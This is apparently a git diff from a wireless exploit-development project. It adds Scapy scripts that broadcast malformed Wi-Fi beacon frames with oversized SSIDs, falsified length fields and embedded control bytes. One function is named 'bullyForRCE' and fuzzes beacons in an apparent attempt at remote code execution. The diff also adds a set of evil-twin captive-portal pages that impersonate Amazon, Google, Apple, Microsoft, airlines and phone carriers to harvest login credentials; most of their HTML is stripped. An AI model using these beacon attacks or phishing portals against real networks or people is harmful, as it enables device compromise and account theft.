diff --git a/scapy/wifi-beacon-random-byte.py b/scapy/wifi-beacon-random-byte.py
index 323c6cb..53b76d6 100644
--- a/scapy/wifi-beacon-random-byte.py
+++ b/scapy/wifi-beacon-random-byte.py
@@ -41,6 +41,7 @@ def sendRandBytesBeacons(numOfBeacons=200,
sendProbe(SSID, repeat, interval)
def sendRandBytesBeaconsRaw(
+ SSID='I-am-your-pony-waifu',
numOfBeacons=200,
lenOfSSIDs=255,
listedLen=255,
@@ -49,16 +50,80 @@ def sendRandBytesBeaconsRaw(
interval=0.2):
for i in range(numOfBeacons):
- SSID = randbytes(lenOfSSIDs)
+ #SSID = randbytes(lenOfSSIDs)
urlEncoded = urllib.parse.quote(SSID)
print(f"\n{i} of {numOfBeacons}\n\tRepeats: {repeat}\n\tListed Length: {listedLen}\n\tReal Length: {lenOfSSIDs}\n\tInterval: {interval} Seconds\n\tSSID: {urlEncoded}")
sendProbeRaw(SSID, repeat, interval, listedLen, lenOverride=lenOverridei)
-sendRandBytesBeaconsRaw(numOfBeacons=200,
- lenOfSSIDs=2,
- listedLen=1,
- lenOverridei=True,
+def overloadParamBeacon(max=10000,
repeat=3,
- interval=0.1)
+ chari = "X",
+ interval=0.2,
+ listedLen=1):
+ for i in range(max):
+ num = i+1000
+ SSIDI = chari*num
+ SSID = f"{num}{SSIDI}"
+
+ dot11 = Dot11(type=0,
+ subtype=8,
+ addr1='ff:ff:ff:ff:ff:ff',
+ addr2=sender,
+ addr3=sender)
+
+ beacon = Dot11Beacon()
+
+ essid = Dot11Elt(ID='SSID',
+ info=RawVal(SSID),
+ len=listedLen)
+
+ frame = RadioTap()/dot11/beacon/essid
+
+ print(f"\nSending {num}{chari}*{num} as SSID With Length Of {listedLen}")
+ sendp(frame, iface=iface, inter=interval, count=repeat)
+
+#overloadParamBeacon()
+
+
+
+#$sendRandBytesBeaconsRaw(
+# SSID = b"YOU-SEEM-FUNDAMETALLY-FUN\x00\x0AI-THINK-ID-LIKE-TO-KNOW-YOU\x00\x0AI-FEEL-LIKE-BEING-YOUR-FRIEND\x00\x0AI-AM-YOUR-PONY-WAIFU",
+# numOfBeacons=200,
+# lenOfSSIDs=2,
+# listedLen=1,
+# lenOverridei=True,
+# repeat=3,
+# interval=0.1)
+
+def bullyForRCE(max=10000,
+ repeat=3,
+ chari = "\xff",
+ interval=0.2,
+ listedLen=255):
+
+ for i in range(max):
+ chars = chari*i
+ #SSID = f"n-{i}-YOU-SEEM-FUNDAMETALLY-FUN-I-THINK-ID-LIKE-TO-KNOW-YOU{chars}\xc6\x54\x00-I-FEEL-LIKE-BEING-YOUR-FRIEND-I-AM-YOUR-PONY-WAIFU"
+ SSID = f"n{chars}"
+ urlEncoded = urllib.parse.quote(SSID)
+
+ dot11 = Dot11(type=0,
+ subtype=8,
+ addr1='ff:ff:ff:ff:ff:ff',
+ addr2=sender,
+ addr3=sender)
+
+ beacon = Dot11Beacon()
+
+ essid = Dot11Elt(ID='SSID',
+ info=RawVal(SSID),
+ len=listedLen)
+
+ frame = RadioTap()/dot11/beacon/essid
+
+ print(f"\nSending {i}/{max}\n\tWith SSID {urlEncoded}\n\tWith Length Of {listedLen}")
+ sendp(frame, iface=iface, inter=interval, count=repeat)
+
+bullyForRCE()
#sendRandBytesBeacons(100, 20, 5, 0.1)
diff --git a/scapy/wifi-beacon-scapy.py b/scapy/wifi-beacon-scapy.py
index fcf571d..0d93b45 100644
--- a/scapy/wifi-beacon-scapy.py
+++ b/scapy/wifi-beacon-scapy.py
@@ -25,5 +25,6 @@ def beacon_normie(SSID):
#longgg = "\xFF"*800
#longggg = f"\x00{longgg}\x00"
#beacon_raw(longggg)
-SSID = b"YOU-SEEM-FUNDAMETALLY-FUN\x0AI-THINK-ID-LIKE-TO-KNOW-YOU\x0AI-FEEL-LIKE-BEING-YOUR-FRIEND\x0AI-AM-YOUR-PONY-WAIFU"
+#SSID = b"YOU-SEEM-FUNDAMETALLY-FUN\x00\x0AI-THINK-ID-LIKE-TO-KNOW-YOU\x00\x0AI-FEEL-LIKE-BEING-YOUR-FRIEND\x00\x0AI-AM-YOUR-PONY-WAIFU\x0a\x00\xc6\x54\x00"
+SSID = b"YOU-SEEM-FUNDAMETALLY-FUN-I-THINK-ID-LIKE-TO-KNOW-YOU\x0a\x00\xc6\x54\x00-I-FEEL-LIKE-BEING-YOUR-FRIEND-I-AM-YOUR-PONY-WAIFU"
beacon_raw(SSID)
diff --git a/sd-card-helpers/dump-script b/sd-card/dump-script
old mode 100644
new mode 100755
similarity index 69%
rename from sd-card-helpers/dump-script
rename to sd-card/dump-script
index 0acf5cc..1c89b63
--- a/sd-card-helpers/dump-script
+++ b/sd-card/dump-script
@@ -1,9 +1,9 @@
#!/bin/bash
-number=2
-tag=incremental-overrun-nullbyte
-blocks=32
+number=0
+tag=fresh
+blocks=75
blocksize=1M
-dumpsize=32M
+dumpsize=75M
@@ -15,7 +15,7 @@ block=/dev/$disk
timestamp=$(date "+%d%m%Y-%H.%M.%S-%Z")
-filename="/home/kali/marauderexploitdev/imgs/${number}-${tag}-${dumpsize}-${timestamp}.img"
+filename="./imgs/${number}-${tag}-${dumpsize}-${timestamp}.img"
echo -e "\nWriting to ${filename}"
sudo dd if=$block of=$filename bs=$blocksize count=$blocks status=progress conv=fdatasync
diff --git a/sd-card/marauder_microsd/AlaskaAirline.html b/sd-card/marauder_microsd/AlaskaAirline.html
new file mode 100644
index 0000000..27ae11d
--- /dev/null
+++ b/sd-card/marauder_microsd/AlaskaAirline.html
@@ -0,0 +1,89 @@
+
+
+
+
+
+
+
+
+
+
+
diff --git a/sd-card/marauder_microsd/Amazon.html b/sd-card/marauder_microsd/Amazon.html
new file mode 100644
index 0000000..44c509b
--- /dev/null
+++ b/sd-card/marauder_microsd/Amazon.html
@@ -0,0 +1,100 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
Sign in
+ Use your Amazon Account
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/sd-card/marauder_microsd/Better_Google_Mobile.html b/sd-card/marauder_microsd/Better_Google_Mobile.html
new file mode 100644
index 0000000..3861095
--- /dev/null
+++ b/sd-card/marauder_microsd/Better_Google_Mobile.html
@@ -0,0 +1,146 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/sd-card/marauder_microsd/CoxWifi.html b/sd-card/marauder_microsd/CoxWifi.html
new file mode 100644
index 0000000..6a525a0
--- /dev/null
+++ b/sd-card/marauder_microsd/CoxWifi.html
@@ -0,0 +1 @@
+CoxWifi-index.html
\ No newline at end of file
diff --git a/sd-card/marauder_microsd/Facebook.html b/sd-card/marauder_microsd/Facebook.html
new file mode 100644
index 0000000..b75a500
--- /dev/null
+++ b/sd-card/marauder_microsd/Facebook.html
@@ -0,0 +1,83 @@
+
+
+
+
+
+
+
+
+
+
diff --git a/sd-card/marauder_microsd/FakeHack.html b/sd-card/marauder_microsd/FakeHack.html
new file mode 100644
index 0000000..0f0620d
--- /dev/null
+++ b/sd-card/marauder_microsd/FakeHack.html
@@ -0,0 +1,61 @@
+
+
+
+
+
+
+ Hacking Simulation
+
+
+
+
+
+
diff --git a/sd-card/marauder_microsd/FakeHack2.html b/sd-card/marauder_microsd/FakeHack2.html
new file mode 100644
index 0000000..e4313a5
--- /dev/null
+++ b/sd-card/marauder_microsd/FakeHack2.html
@@ -0,0 +1,58 @@
+
+
+
+ Captive Portal
+
+
+
+ Connect
+
+
+
+
diff --git a/sd-card/marauder_microsd/Frequency.html b/sd-card/marauder_microsd/Frequency.html
new file mode 100644
index 0000000..aa130cb
--- /dev/null
+++ b/sd-card/marauder_microsd/Frequency.html
@@ -0,0 +1,71 @@
+
+
+
+ Captive Portal
+
+
+
+ Connect
+
+
+
+
diff --git a/sd-card/marauder_microsd/Google_Modern.html b/sd-card/marauder_microsd/Google_Modern.html
new file mode 100644
index 0000000..79b96b8
--- /dev/null
+++ b/sd-card/marauder_microsd/Google_Modern.html
@@ -0,0 +1,74 @@
+
+
+
+
+
+
+
+
+
+
diff --git a/sd-card/marauder_microsd/Jet_Blue.html b/sd-card/marauder_microsd/Jet_Blue.html
new file mode 100644
index 0000000..21318dc
--- /dev/null
+++ b/sd-card/marauder_microsd/Jet_Blue.html
@@ -0,0 +1,60 @@
+
+
+
+
+
+
+
+
+
+
diff --git a/sd-card/marauder_microsd/Matrix.html b/sd-card/marauder_microsd/Matrix.html
new file mode 100644
index 0000000..ab98091
--- /dev/null
+++ b/sd-card/marauder_microsd/Matrix.html
@@ -0,0 +1,139 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/sd-card/marauder_microsd/Microsoft.html b/sd-card/marauder_microsd/Microsoft.html
new file mode 100644
index 0000000..34cdc64
--- /dev/null
+++ b/sd-card/marauder_microsd/Microsoft.html
@@ -0,0 +1,77 @@
+
+
+
+
+
+
+
+
+
+
diff --git a/sd-card/marauder_microsd/Prank_Game.html b/sd-card/marauder_microsd/Prank_Game.html
new file mode 100644
index 0000000..4f13658
--- /dev/null
+++ b/sd-card/marauder_microsd/Prank_Game.html
@@ -0,0 +1,76 @@
+
+
+
+ Guess the number to use WiFi
+
+
+
+ Guess the number to use WiFi
+ Enter a number between 0-10
+
+ Guess
+
+ Reset Game
+
+
+
diff --git a/sd-card/marauder_microsd/Spectrum.html b/sd-card/marauder_microsd/Spectrum.html
new file mode 100644
index 0000000..4ac5cd4
--- /dev/null
+++ b/sd-card/marauder_microsd/Spectrum.html
@@ -0,0 +1,91 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
Welcome
+
Please log in using your Spectrum account
+
+
+
+
diff --git a/sd-card/marauder_microsd/SpiritAirlines.html b/sd-card/marauder_microsd/SpiritAirlines.html
new file mode 100644
index 0000000..ab93392
--- /dev/null
+++ b/sd-card/marauder_microsd/SpiritAirlines.html
@@ -0,0 +1,100 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
Use your Spirit Airlines Account for Free WiFi Login
+
+
+
+
+
+
+
+
+
diff --git a/sd-card/marauder_microsd/Starlink.html b/sd-card/marauder_microsd/Starlink.html
new file mode 100644
index 0000000..92d02fb
--- /dev/null
+++ b/sd-card/marauder_microsd/Starlink.html
@@ -0,0 +1,63 @@
+
+
+
+
+
+
+
+
+
+
+
diff --git a/sd-card/marauder_microsd/T_Mobile.html b/sd-card/marauder_microsd/T_Mobile.html
new file mode 100644
index 0000000..cd7d32f
--- /dev/null
+++ b/sd-card/marauder_microsd/T_Mobile.html
@@ -0,0 +1,94 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ t-mobile
+
+
+
+
+
+
+
Sign in
+
+
Use your T-Mobile account
+
+
+
+
+
+
+
diff --git a/sd-card/marauder_microsd/Twitch.html b/sd-card/marauder_microsd/Twitch.html
new file mode 100644
index 0000000..e86a4d3
--- /dev/null
+++ b/sd-card/marauder_microsd/Twitch.html
@@ -0,0 +1,70 @@
+
+
+
+
+
+
+
+
+
Welcome
+
Login using your Twitch Account
+
+
+
+
diff --git a/sd-card/marauder_microsd/Twitter.html b/sd-card/marauder_microsd/Twitter.html
new file mode 100644
index 0000000..4cb909b
--- /dev/null
+++ b/sd-card/marauder_microsd/Twitter.html
@@ -0,0 +1,2 @@
+
+
diff --git a/sd-card/marauder_microsd/Verizon.html b/sd-card/marauder_microsd/Verizon.html
new file mode 100644
index 0000000..09d7909
--- /dev/null
+++ b/sd-card/marauder_microsd/Verizon.html
@@ -0,0 +1,91 @@
+
+
+
+
+
+
+
+
+
+
diff --git a/sd-card/marauder_microsd/american_airline.html b/sd-card/marauder_microsd/american_airline.html
new file mode 100644
index 0000000..3c2cadd
--- /dev/null
+++ b/sd-card/marauder_microsd/american_airline.html
@@ -0,0 +1,116 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
Sign in
+
+
Using your AAdvantage number or username and password.
+
+
+
+
+
+
+
diff --git a/sd-card/marauder_microsd/ap.config.txt b/sd-card/marauder_microsd/ap.config.txt
new file mode 100644
index 0000000..7cf85fd
--- /dev/null
+++ b/sd-card/marauder_microsd/ap.config.txt
@@ -0,0 +1 @@
+Guest-WiFi
diff --git a/sd-card/marauder_microsd/apple.html b/sd-card/marauder_microsd/apple.html
new file mode 100644
index 0000000..b3cbe5a
--- /dev/null
+++ b/sd-card/marauder_microsd/apple.html
@@ -0,0 +1,279 @@
+
+
+
+
+
+
+
+ Login - Apple
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/sd-card/marauder_microsd/at&t.html b/sd-card/marauder_microsd/at&t.html
new file mode 100644
index 0000000..6aec7e8
--- /dev/null
+++ b/sd-card/marauder_microsd/at&t.html
@@ -0,0 +1,94 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
Sign in
+
+
Use your AT&T Account to gain Access to the WiFi Network
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/sd-card/marauder_microsd/detla_airline.html b/sd-card/marauder_microsd/detla_airline.html
new file mode 100644
index 0000000..a40ff71
--- /dev/null
+++ b/sd-card/marauder_microsd/detla_airline.html
@@ -0,0 +1,115 @@
+
+
+
+
+
+
+
+
+
+
+
Sign in
+
+
Using your SkyMiles number or username and password.
+
+
+
+
+
+
diff --git a/sd-card/marauder_microsd/index.html b/sd-card/marauder_microsd/index.html
new file mode 100644
index 0000000..c1a998d
--- /dev/null
+++ b/sd-card/marauder_microsd/index.html
@@ -0,0 +1 @@
+HTMLINDEXFILE
diff --git a/sd-card/marauder_microsd/southwest_airline.html b/sd-card/marauder_microsd/southwest_airline.html
new file mode 100644
index 0000000..84ce3b9
--- /dev/null
+++ b/sd-card/marauder_microsd/southwest_airline.html
@@ -0,0 +1,110 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
Sign In
+
+
Sign in using your Rapid Rewards number or username and password
+
+
+
+
+
+
+
diff --git a/sd-card/marauder_microsd/united_airline.html b/sd-card/marauder_microsd/united_airline.html
new file mode 100644
index 0000000..d92eda3
--- /dev/null
+++ b/sd-card/marauder_microsd/united_airline.html
@@ -0,0 +1,117 @@
+
+
+
+
+
+
+
+
+
+
+
Sign in
+
+
Using your MileagePlus® number and password.
+
+
+
+
+
+
diff --git a/sd-card-helpers/mount-marauder-sd b/sd-card/mount-marauder-sd
old mode 100644
new mode 100755
similarity index 100%
rename from sd-card-helpers/mount-marauder-sd
rename to sd-card/mount-marauder-sd
diff --git a/sd-card-helpers/umount-marauder-sd b/sd-card/umount-marauder-sd
old mode 100644
new mode 100755
similarity index 100%
rename from sd-card-helpers/umount-marauder-sd
rename to sd-card/umount-marauder-sd
diff --git a/sd-card-helpers/zero-recreate-sd b/sd-card/zero-recreate-sd
old mode 100644
new mode 100755
similarity index 100%
rename from sd-card-helpers/zero-recreate-sd
rename to sd-card/zero-recreate-sd